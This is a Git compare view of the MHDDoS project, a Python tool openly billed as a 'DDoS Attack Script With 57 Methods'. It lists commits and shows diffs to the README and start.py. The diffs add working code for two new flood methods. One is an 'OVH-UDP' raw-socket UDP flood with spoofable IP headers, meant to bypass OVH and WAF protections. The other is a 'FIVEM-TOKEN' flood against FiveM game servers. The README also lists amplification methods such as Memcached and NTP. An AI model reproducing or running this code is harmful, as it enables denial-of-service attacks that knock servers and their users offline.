Compare commits

...

18 Commits

Author SHA1 Message Date
王维同学 a14a864bcb
Merge 5a85e9cb50 into fa57712c70 2025-10-22 13:26:14 -07:00
_MRZT721010_ fa57712c70
New Attack Methods Added — FIVEM-TOKEN, OVH-UDP
New Attack Methods Added — FIVEM-TOKEN, OVH-UDP
2025-10-22 23:39:24 +03:30
CirqueiraDev 3753b164b8 conflicts resolved 2025-10-22 17:01:55 -03:00
CirqueiraDev da88a2fd7a discord method removed 2025-10-22 16:48:25 -03:00
王维同学 5a85e9cb50
GUI for MHDDOS
Create GUI By Qt5 to make the project easy to use.
2025-07-31 20:13:07 +08:00
CirqueiraDev b09c193ff0 Added OVH-UDP 2025-06-25 14:10:46 -03:00
CirqueiraDev 0baaf4c432 Added OVH-UDP 2025-06-25 13:52:56 -03:00
CirqueiraDev 608b38de68 Added OVH-UDP 2025-06-25 13:51:31 -03:00
CirqueiraDev e9d0e8da68 Updated 2025-06-25 13:23:58 -03:00
CirqueiraDev 33b8bfe64e Atualizei o README e removi o diretório d 2025-06-25 13:23:58 -03:00
cirqueira 723c79b028
Update README.md 2025-06-25 12:22:19 -03:00
cirqueira 3ae9541128
Update README.md 2025-06-24 18:43:38 -03:00
cirqueira 55bd1fd9a8
Update README.md 2025-06-23 15:08:53 -03:00
cirqueira c8c54d31b6
Update start.py 2025-06-23 15:07:51 -03:00
cirqueira a02d1f06c7
Update README.md 2025-06-23 15:06:45 -03:00
cirqueira 4f90366e61
Delete d 2025-06-23 14:57:33 -03:00
cirqueira e6fc6e6d26
Update d 2025-06-23 14:57:17 -03:00
CirqueiraDev d52ca3c604 Adiciona métodos DISCORD e FIVEM-TOKEN 2025-06-23 14:54:05 -03:00
4 changed files with 4553 additions and 10 deletions

2203
MHDDOS_GUI.py Normal file

File diff suppressed because it is too large Load Diff

2276
MHDDOS_GUI_zh_CN.py Normal file

File diff suppressed because it is too large Load Diff

View File

@ -1,4 +1,4 @@
<h1 align="center">MHDDoS - DDoS Attack Script With 56 Methods</h1>
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
<p align="center">
@ -49,12 +49,14 @@
* <img src="https://raw.githubusercontent.com/kgretzky/pwndrop/master/media/pwndrop-logo-512.png" width="16" height="16" alt="tcp"> TCP | TCP Flood Bypass
* <img src="https://styles.redditmedia.com/t5_2rxmiq/styles/profileIcon_snoob94cdb09-c26c-4c24-bd0c-66238623cc22-headshot.png" width="16" height="16" alt="udp"> UDP | UDP Flood Bypass
* <img src="https://cdn-icons-png.flaticon.com/512/1918/1918576.png" width="16" height="16" alt="syn"> SYN | SYN Flood
* <img src="https://static-00.iconduck.com/assets.00/ovh-icon-2048x2048-l4c3izvg.png" width="16" height="16" alt="ovh"> OVH-UDP | UDP flood with random HTTP headers and binary payload to bypass OVH and WAFs.
* <img src="https://cdn-icons-png.flaticon.com/512/1017/1017466.png" width="16" height="16" alt="cps"> CPS | Open and close connections with proxy
* <img src="https://icon-library.com/images/icon-ping/icon-ping-28.jpg" width="16" height="16" alt="icmp"> ICMP | Icmp echo request flood (Layer3)
* <img src="https://s6.uupload.ir/files/1059643_g8hp.png" width="16" height="16" alt="connection"> CONNECTION | Open connection alive with proxy
* <img src="https://ia803109.us.archive.org/27/items/source-engine-video-projects/source-engine-video-projects_itemimage.png" width="16" height="16" alt="vse"> VSE | Send Valve Source Engine Protocol
* <img src="https://mycrackfree.com/wp-content/uploads/2018/08/TeamSpeak-Server-9.png" width="16" height="16" alt="teamspeak 3"> TS3 | Send Teamspeak 3 Status Ping Protocol
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="fivem"> FIVEM | Send FiveM Status Ping Protocol
* <img src="https://github.com/user-attachments/assets/f40748bf-dd28-4294-b862-cb0acbc74eea" width="16" height="16" alt="fivem-token"> FIVEM-TOKEN | Send FiveM confirmation token flood
* <img src="https://cdn.iconscout.com/icon/free/png-512/redis-4-1175103.png" width="16" height="16" alt="mem"> MEM | Memcached Amplification
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="ntp"> NTP | NTP Amplification
* <img src="https://cdn-icons-png.flaticon.com/512/4712/4712139.png" width="16" height="16" alt="mcbot"> MCBOT | Minecraft Bot Attack

View File

@ -10,7 +10,7 @@ from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from re import compile
from random import choice as randchoice
from random import choice as randchoice, randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM, IPPROTO_ICMP,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
@ -136,8 +136,8 @@ class Methods:
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
"MCBOT", "CONNECTION", "CPS", "FIVEM",
"TS3", "MCPE", "ICMP"
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
"TS3", "MCPE", "ICMP", "OVH-UDP",
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
@ -469,6 +469,8 @@ class Layer4(Thread):
"TS3": self.TS3,
"MCPE": self.MCPE,
"FIVEM": self.FIVEM,
"FIVEM-TOKEN": self.FIVEMTOKEN,
"OVH-UDP": self.OVHUDP,
"MINECRAFT": self.MINECRAFT,
"CPS": self.CPS,
"CONNECTION": self.CONNECTION,
@ -539,6 +541,14 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def OVHUDP(self) -> None:
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while True:
for payload in self._generate_ovhudp():
Tools.sendto(s, payload, self._target)
Tools.safe_close(s)
def ICMP(self) -> None:
payload = self._genrate_icmp()
s = None
@ -558,8 +568,7 @@ class Layer4(Thread):
def AMP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *next(self._amp_payloads)):
continue
@ -597,6 +606,24 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def FIVEMTOKEN(self) -> None:
global BYTES_SEND, REQUESTS_SENT
# Generete token and guid
token = str(uuid4())
steamid_min = 76561197960265728
steamid_max = 76561199999999999
guid = str(randint(steamid_min, steamid_max))
# Build Payload
payload_str = f"token={token}&guid={guid}"
payload = payload_str.encode('utf-8')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
@ -624,6 +651,41 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def _generate_ovhudp(self) -> List[bytes]:
packets = []
methods = ["PGET", "POST", "HEAD", "OPTIONS", "PURGE"]
paths = ['/0/0/0/0/0/0', '/0/0/0/0/0/0/', '\\0\\0\\0\\0\\0\\0', '\\0\\0\\0\\0\\0\\0\\', '/', '/null', '/%00%00%00%00']
for _ in range(randint(2, 4)):
ip = IP()
ip.set_ip_src(__ip__)
ip.set_ip_dst(self._target[0])
udp = UDP()
udp.set_uh_sport(randint(1024, 65535))
udp.set_uh_dport(self._target[1])
payload_size = randint(1024, 2048)
random_part = randbytes(payload_size).decode("latin1", "ignore")
method = randchoice(methods)
path = randchoice(paths)
payload_str = (
f"{method} {path}{random_part} HTTP/1.1\n"
f"Host: {self._target[0]}:{self._target[1]}\r\n\r\n"
)
payload = payload_str.encode("latin1", "ignore")
udp.contains(Data(payload))
ip.contains(udp)
packets.append(ip.get_packet())
return packets
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(__ip__)
@ -1160,7 +1222,10 @@ class HttpFlood(Thread):
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
@ -1176,9 +1241,6 @@ class HttpFlood(Thread):
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)